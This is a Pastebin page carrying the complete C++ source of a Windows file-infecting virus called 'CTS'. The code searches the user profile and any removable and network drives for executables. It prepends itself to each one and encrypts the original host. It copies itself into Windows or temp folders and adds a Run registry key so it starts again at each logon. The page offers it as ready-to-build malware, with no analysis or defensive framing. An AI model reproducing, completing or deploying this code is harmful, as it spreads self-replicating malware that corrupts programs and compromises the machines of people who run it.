API tools faq
paste
Advertisement
FlyFar

CTS File Appending Virus - Source Code

FlyFar
Mar 2nd, 2023
568
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C++ 10.50 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. #include <Windows.h>
  2. #include "ntdll.h"
  3.  
  4. #pragma comment(lib,"ntdll.lib")
  5.  
  6. #define CTS_VIRUS_SIGNATURE '\nSTC'
  7. #define CTS_KEY_LENGTH 16
  8.  
  9. typedef struct _CTS_FILE_DATA
  10. {
  11.     ULONG FileSize;
  12.     HANDLE hFile;
  13.     UCHAR Data[1];
  14. }CTS_FILE_DATA,*PCTS_FILE_DATA;
  15.  
  16. typedef struct _CTS_APPEND_DATA
  17. {
  18.     ULONG Signature;
  19.     ULONG FileSize;
  20.     UCHAR Key[16];
  21. }CTS_APPEND_DATA,*PCTS_APPEND_DATA;
  22.  
  23. LPWSTR CtsVirusPath;
  24. HCRYPTPROV CtsCryptProv;
  25.  
  26. PVOID CtsVirusFile;
  27. ULONG CtsVirusSize,CtsVirusChecksum;
  28.  
  29. ULONG __fastcall CtsComputeCrc32(PVOID Buffer,ULONG Length)
  30. {
  31.     ULONG i,j,Crc=0xFFFFFFFF,Crc32Table[256];
  32.     PUCHAR ptr=(PUCHAR)Buffer;
  33.  
  34.     for(i=0;i<256;i++)
  35.     {
  36.         Crc32Table[i]=i;
  37.  
  38.         for(j=0;j<8;j++)
  39.         {
  40.             Crc32Table[i]=Crc32Table[i] & 1 ? (Crc32Table[i]>>1)^0xEDB88320:Crc32Table[i]>>1;
  41.         }
  42.     }
  43.  
  44.     for(i=0;i<Length;i++)
  45.     {
  46.         Crc=Crc32Table[(Crc^ptr[i]) & 0xFF]^(Crc>>8);
  47.     }
  48.  
  49.     return ~Crc;
  50. }
  51.  
  52. void __fastcall CtsGenerateRandomData(PVOID Buffer,ULONG Length)
  53. {
  54.     CryptGenRandom(CtsCryptProv,Length,(PUCHAR)Buffer);
  55. }
  56.  
  57. ULONG WINAPI CtsGenerateRandomNumber()
  58. {
  59.     ULONG i=0;
  60.  
  61.     CtsGenerateRandomData(&i,sizeof(ULONG));
  62.     return i;
  63. }
  64.  
  65. void __fastcall CtsCryptData(PVOID Buffer,ULONG Length,PVOID Key)
  66. {
  67.     ULONG i,j,x;
  68.     UCHAR State[256],Swap,*k=(PUCHAR)Key,*ptr=(PUCHAR)Buffer;
  69.  
  70.     for(i=0;i<256;i++)
  71.     {
  72.         State[i]=(UCHAR)i;
  73.     }
  74.  
  75.     j=0;
  76.  
  77.     for(i=0;i<256;i++)
  78.     {
  79.         j=(j+State[i]+k[i % CTS_KEY_LENGTH]) & 0xFF;
  80.         Swap=State[i];
  81.  
  82.         State[i]=State[j];
  83.         State[j]=Swap;
  84.     }
  85.  
  86.     i=0;
  87.     j=0;
  88.  
  89.     for(x=0;x<Length;x++)
  90.     {
  91.         i=(i+1) & 0xFF;
  92.         j=(j+State[i]) & 0xFF;
  93.  
  94.         Swap=State[i];
  95.  
  96.         State[i]=State[j];
  97.         State[j]=Swap;
  98.  
  99.         ptr[x]^=State[(State[i]+State[j]) & 0xFF];
  100.     }
  101. }
  102.  
  103. PCTS_FILE_DATA __fastcall CtsLoadFile(LPWSTR FileName)
  104. {
  105.     ULONG FileSize,read;
  106.     HANDLE hFile;
  107.  
  108.     PCTS_FILE_DATA FileData;
  109.  
  110.     hFile=CreateFile(FileName,GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);
  111.  
  112.     if(hFile==INVALID_HANDLE_VALUE)
  113.     {
  114.         return NULL;
  115.     }
  116.  
  117.     FileSize=GetFileSize(hFile,NULL);
  118.     FileData=(PCTS_FILE_DATA)LocalAlloc(LMEM_ZEROINIT,sizeof(CTS_FILE_DATA)+FileSize);
  119.  
  120.     if(!FileData)
  121.     {
  122.         NtClose(hFile);
  123.         return NULL;
  124.     }
  125.  
  126.     if(!ReadFile(hFile,FileData->Data,FileSize,&read,NULL))
  127.     {
  128.         NtClose(hFile);
  129.  
  130.         LocalFree(FileData);
  131.         return NULL;
  132.     }
  133.  
  134.     FileData->FileSize=FileSize;
  135.     FileData->hFile=hFile;
  136.  
  137.     SetFilePointer(FileData->hFile,0,NULL,FILE_BEGIN);
  138.     return FileData;
  139. }
  140.  
  141. void __fastcall CtsUnloadFile(PCTS_FILE_DATA FileData)
  142. {
  143.     NtClose(FileData->hFile);
  144.     LocalFree(FileData);
  145. }
  146.  
  147. void WINAPI CtsExtractFile(PVOID Buffer,ULONG Length,LPWSTR CommandLine)
  148. {
  149.     ULONG i,write;
  150.     HANDLE hFile;
  151.  
  152.     wchar_t FilePath[512],FileName[16];
  153.  
  154.     BOOL Sucess,Infected;
  155.     BOOLEAN IsAdmin,bl;
  156.  
  157.     HKEY hKey;
  158.  
  159.     PVOID AppendedFile;
  160.     PCTS_APPEND_DATA AppendData;
  161.  
  162.     STARTUPINFO si;
  163.     PROCESS_INFORMATION pi;
  164.  
  165.     wchar_t c[]=
  166.         L"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
  167.         L"abcdefghijklmnopqrstuvwxyz"
  168.         L"0123456789";
  169.  
  170.     AppendData=(PCTS_APPEND_DATA)((PUCHAR)Buffer+Length-sizeof(CTS_APPEND_DATA));
  171.  
  172.     if(AppendData->Signature==CTS_VIRUS_SIGNATURE)
  173.     {
  174.         AppendedFile=(PUCHAR)AppendData-AppendData->FileSize;
  175.         CtsCryptData(AppendedFile,AppendData->FileSize,AppendData->Key);
  176.  
  177.         for(i=0;i<15;i++)
  178.         {
  179.             FileName[i]=c[CtsGenerateRandomNumber() % ((sizeof(c)/sizeof(wchar_t))-1)];
  180.         }
  181.  
  182.         FileName[i]=0;
  183.         ExpandEnvironmentStrings(L"%temp%\\",FilePath,512);
  184.  
  185.         wcscat(FilePath,FileName);
  186.         wcscat(FilePath,L".exe");
  187.  
  188.         hFile=CreateFile(FilePath,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
  189.  
  190.         if(hFile!=INVALID_HANDLE_VALUE)
  191.         {
  192.             Sucess=WriteFile(hFile,AppendedFile,AppendData->FileSize,&write,NULL);
  193.             NtClose(hFile);
  194.  
  195.             if(Sucess)
  196.             {
  197.                 memset(&si,0,sizeof(si));
  198.                 memset(&pi,0,sizeof(pi));
  199.  
  200.                 wcscat(FilePath,L" ");
  201.                 wcscat(FilePath,CommandLine);
  202.  
  203.                 if(CreateProcess(NULL,FilePath,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
  204.                 {
  205.                     NtClose(pi.hThread);
  206.                     NtClose(pi.hProcess);
  207.                 }
  208.             }
  209.         }
  210.     }
  211.  
  212.     CtsVirusFile=Buffer;
  213.     CtsVirusSize=AppendData->Signature==CTS_VIRUS_SIGNATURE ? Length-sizeof(CTS_APPEND_DATA)-AppendData->FileSize:Length;
  214.  
  215.     Infected=AppendData->Signature==CTS_VIRUS_SIGNATURE;
  216.  
  217.     memset(AppendedFile,0,AppendData->FileSize);
  218.     memset(AppendData,0,sizeof(CTS_APPEND_DATA));
  219.  
  220.     IsAdmin=NT_SUCCESS(RtlAdjustPrivilege(20,TRUE,FALSE,&bl));
  221.     ExpandEnvironmentStrings(IsAdmin ? L"%windir%\\CTS.exe":L"%temp%\\CTS.exe",FilePath,512);
  222.  
  223.     hFile=CreateFile(FilePath,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
  224.  
  225.     if(hFile!=INVALID_HANDLE_VALUE)
  226.     {
  227.         WriteFile(hFile,CtsVirusFile,CtsVirusSize,&write,NULL);
  228.         NtClose(hFile);
  229.     }
  230.  
  231.     if(!RegCreateKey(IsAdmin ? HKEY_LOCAL_MACHINE:HKEY_CURRENT_USER,L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey))
  232.     {
  233.         RegSetValueEx(hKey,L"CTS",0,REG_SZ,(PUCHAR)FilePath,(wcslen(FilePath)+1)*sizeof(wchar_t));
  234.         RegCloseKey(hKey);
  235.     }
  236.  
  237.     if(Infected)
  238.     {
  239.         memset(&si,0,sizeof(si));
  240.         memset(&pi,0,sizeof(pi));
  241.  
  242.         CreateProcess(FilePath,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi);
  243.         ExitProcess(0);
  244.     }
  245.  
  246.     CtsVirusChecksum=CtsComputeCrc32(CtsVirusFile,CtsVirusSize);
  247. }
  248.  
  249. void WINAPI CtsExtractVirus(LPWSTR CommandLine)
  250. {
  251.     ULONG FileSize,read;
  252.     HANDLE hFile;
  253.  
  254.     PVOID Buffer;
  255.  
  256.     hFile=CreateFile(CtsVirusPath,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,NULL);
  257.  
  258.     if(hFile!=INVALID_HANDLE_VALUE)
  259.     {
  260.         FileSize=GetFileSize(hFile,NULL);
  261.         Buffer=LocalAlloc(LMEM_ZEROINIT,FileSize);
  262.  
  263.         if(Buffer)
  264.         {
  265.             if(ReadFile(hFile,Buffer,FileSize,&read,NULL))
  266.             {
  267.                 CtsExtractFile(Buffer,FileSize,CommandLine);
  268.             }
  269.         }
  270.     }
  271. }
  272.  
  273. void __fastcall CtsInfectFile(LPWSTR FileName)
  274. {
  275.     PCTS_FILE_DATA FileData;
  276.     CTS_APPEND_DATA AppendData;
  277.  
  278.     ULONG write;
  279.     UCHAR Key[CTS_KEY_LENGTH];
  280.  
  281.     FileData=CtsLoadFile(FileName);
  282.  
  283.     if(FileData)
  284.     {
  285.         if(CtsComputeCrc32(FileData->Data,FileData->FileSize)==CtsVirusChecksum)
  286.         {
  287.             CtsUnloadFile(FileData);
  288.             return;
  289.         }
  290.  
  291.         if(*(PULONG)((PUCHAR)FileData->Data+FileData->FileSize-sizeof(CTS_APPEND_DATA))==CTS_VIRUS_SIGNATURE)
  292.         {
  293.             CtsUnloadFile(FileData);
  294.             return;
  295.         }
  296.  
  297.         if(WriteFile(FileData->hFile,CtsVirusFile,CtsVirusSize,&write,NULL))
  298.         {
  299.             CtsGenerateRandomData(Key,CTS_KEY_LENGTH);
  300.             CtsCryptData(FileData->Data,FileData->FileSize,Key);
  301.  
  302.             AppendData.Signature=CTS_VIRUS_SIGNATURE;
  303.             AppendData.FileSize=FileData->FileSize;
  304.  
  305.             memcpy(AppendData.Key,Key,CTS_KEY_LENGTH);
  306.  
  307.             WriteFile(FileData->hFile,FileData->Data,FileData->FileSize,&write,NULL);
  308.             WriteFile(FileData->hFile,&AppendData,sizeof(CTS_APPEND_DATA),&write,NULL);
  309.  
  310.             FlushFileBuffers(FileData->hFile);
  311.         }
  312.  
  313.         CtsUnloadFile(FileData);
  314.     }
  315. }
  316.  
  317. BOOL WINAPI CtsInitialize()
  318. {
  319.     PPEB Peb;
  320.     PLDR_DATA_TABLE_ENTRY Ldr;
  321.  
  322.     Peb=(PPEB)__readfsdword(0x30);
  323.     Ldr=CONTAINING_RECORD(Peb->Ldr->InMemoryOrderModuleList.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink);
  324.  
  325.     CtsVirusPath=Ldr->FullDllName.Buffer;
  326.  
  327.     if(!CryptAcquireContext(&CtsCryptProv,NULL,NULL,PROV_RSA_FULL,CRYPT_VERIFYCONTEXT))
  328.     {
  329.         return FALSE;
  330.     }
  331.  
  332.     return TRUE;
  333. }
  334.  
  335. void __fastcall CtsSearchFiles(LPWSTR Path)
  336. {
  337.     HANDLE hFind;
  338.     wchar_t SearchName[512],FullPath[512];
  339.  
  340.     WIN32_FIND_DATA FindData;
  341.  
  342.     wsprintf(SearchName,L"%s\\*",Path);
  343.     hFind=FindFirstFile(SearchName,&FindData);
  344.  
  345.     if(hFind!=INVALID_HANDLE_VALUE)
  346.     {
  347.         while(FindNextFile(hFind,&FindData))
  348.         {
  349.             if(FindData.cFileName[0]=='.')
  350.             {
  351.                 continue;
  352.             }
  353.  
  354.             wsprintf(FullPath,L"%s\\%s",Path,FindData.cFileName);
  355.  
  356.             if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
  357.             {
  358.                 CtsSearchFiles(FullPath);
  359.             }
  360.  
  361.             else
  362.             {
  363.                 if(wcsstr(FindData.cFileName,L".exe"))
  364.                 {
  365.                     CtsInfectFile(FullPath);
  366.                 }
  367.             }
  368.         }
  369.  
  370.         FindClose(hFind);
  371.     }
  372. }
  373.  
  374. DWORD WINAPI CtsInfectDriveThread(PVOID p)
  375. {
  376.     CtsSearchFiles((LPWSTR)p);
  377.     LocalFree(p);
  378.  
  379.     return 0;
  380. }
  381.  
  382. DWORD WINAPI CtsSearchDrivesThread(PVOID p)
  383. {
  384.     LARGE_INTEGER delay;
  385.     ULONG DriveType;
  386.  
  387.     wchar_t Drives[1024],*str,*buf;
  388.  
  389.     delay.QuadPart=(__int64)-300000*10000;
  390.  
  391.     while(1)
  392.     {
  393.         memset(Drives,0,sizeof(Drives));
  394.         GetLogicalDriveStrings(1024,Drives);
  395.  
  396.         str=Drives;
  397.  
  398.         while(*str)
  399.         {
  400.             DriveType=GetDriveType(str);
  401.  
  402.             if(DriveType==DRIVE_REMOVABLE || DriveType==DRIVE_REMOTE)
  403.             {
  404.                 buf=(LPWSTR)LocalAlloc(LMEM_ZEROINIT,(wcslen(str)+1)*sizeof(wchar_t));
  405.                 wcscpy(buf,str);
  406.  
  407.                 NtClose(CreateThread(NULL,0,CtsInfectDriveThread,buf,0,NULL));
  408.             }
  409.  
  410.             str+=wcslen(str)+1;
  411.         }
  412.  
  413.         NtDelayExecution(FALSE,&delay);
  414.     }
  415. }
  416.  
  417. int WINAPI wWinMain(HINSTANCE hInst,HINSTANCE hPrev,LPWSTR lpCmdLine,int nCmdShow)
  418. {
  419.     LARGE_INTEGER delay;
  420.     wchar_t UserProfile[1024];
  421.  
  422.     if(!CtsInitialize())
  423.     {
  424.         return -1;
  425.     }
  426.  
  427.     CtsExtractVirus(lpCmdLine);
  428.     CreateMutex(NULL,TRUE,L"Global\\3pc6RWOgectGTFqCowxjeGy3XIGPtLwNrsr2zDctYD4hAU5pj4GW7rm8gHrHyTB6");
  429.  
  430.     if(GetLastError()==ERROR_ALREADY_EXISTS)
  431.     {
  432.         return 0;
  433.     }
  434.  
  435.     CreateThread(NULL,0,CtsSearchDrivesThread,NULL,0,NULL);
  436.     GetEnvironmentVariable(L"userprofile",UserProfile,1024);
  437.  
  438.     delay.QuadPart=(__int64)-300000*10000;
  439.  
  440.     while(1)
  441.     {
  442.         CtsSearchFiles(UserProfile);
  443.         NtDelayExecution(FALSE,&delay);
  444.     }
  445. }
Tags: Infection cts fileappending
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!